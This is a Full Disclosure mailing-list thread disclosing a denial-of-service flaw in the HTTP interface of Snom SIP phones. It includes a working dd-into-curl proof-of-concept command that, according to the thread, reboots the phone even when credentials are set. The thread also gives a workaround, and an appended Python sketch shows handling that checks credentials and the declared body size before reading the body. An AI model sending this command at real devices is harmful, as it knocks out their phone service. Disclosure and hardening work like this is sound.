Hi,
it works fine for me:

dd if=/dev/zero bs=1M count=32 | curl http://SNOMIP --data-binary @-

Phone crashes after just a few seconds.

Best Regards
Max M.

On 12.01.2015 22:20, Martin Schuhmacher wrote:
Hi,

I just did

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/

Response: Unauthorized request

Did I miss anything?

Firmware: snom360-SIP 8.7.4.8 not downloadable any more for some reason?

Yours
Martin

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

On 12.01.2015 17:56, kape...@googlemail.com wrote:
Snom SIP phones (www.snom.com) have a built-in HTTP/HTTPS configuration interface, which is enabled by default. By making a single HTTP POST request all available memory (and CPU) can be exhausted, resulting in a reboot of the phone. This even works if the HTTP/HTTPS interface is protected by username and password (probably the credentials are checked a few more lines later when the complete request has been received).

Affected models: MP, 3XX, 7XX, 8XX (I didn't have any of the other models to test)

Affected firmwares: latest stable, latest beta (most likely some others too)

Workaround: Disable HTTP/HTTPS interface completely.

PoC:

dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE --data-binary @-

P.S. Just if you are wondering.... I did not notify the vendor about this. Almost two years ago I reported multiple vulnerabilities directly to the vendor (including the possibility to install arbitrary software on the device), but not much has changed since then.
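A minimal sketch of the request-handling order the original post suspects is missing, added here as an example and not taken from the post or from Snom firmware: credentials and the declared Content-Length are checked on the headers alone, before any body byte is buffered. Basic authentication, the size limits, and the names `read_head`, `handle` and `sample_request` are assumptions.

```python
import base64, hmac, io

MAX_HEAD = 8 * 1024    # assumed limit for request line + headers
MAX_BODY = 64 * 1024   # assumed limit for a settings-form POST

def read_head(stream):
    """Read only the request line and headers, never more than MAX_HEAD bytes."""
    head = b""
    while not head.endswith(b"\r\n\r\n"):
        byte = stream.read(1)
        if not byte or len(head) >= MAX_HEAD:
            return None
        head += byte
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def handle(stream, user, password):
    """Decide on the headers alone; returns (status, body bytes read)."""
    parsed = read_head(stream)
    if parsed is None:
        return 400, 0
    _, headers = parsed
    expected = b"Basic " + base64.b64encode(f"{user}:{password}".encode())
    supplied = headers.get("authorization", "").encode("latin-1")
    if not hmac.compare_digest(supplied, expected):
        return 401, 0                      # rejected before any body byte is read
    if "transfer-encoding" in headers:
        return 411, 0                      # no unbounded chunked uploads
    raw = headers.get("content-length", "0")
    if not (raw.isascii() and raw.isdigit()):
        return 400, 0
    length = int(raw)
    if length > MAX_BODY:
        return 413, 0                      # oversized claim refused up front
    return 200, len(stream.read(length))

def sample_request(length, auth=None, body=b""):
    """Constructed request for the demo; not captured traffic."""
    head = f"POST / HTTP/1.1\r\nHost: phone.example\r\nContent-Length: {length}\r\n"
    if auth:
        head += "Authorization: Basic " + base64.b64encode(auth.encode()).decode() + "\r\n"
    return io.BytesIO(head.encode() + b"\r\n" + body)
```

On a real socket the same order applies: send the 401 or 413 and close the connection instead of draining the rest of the upload.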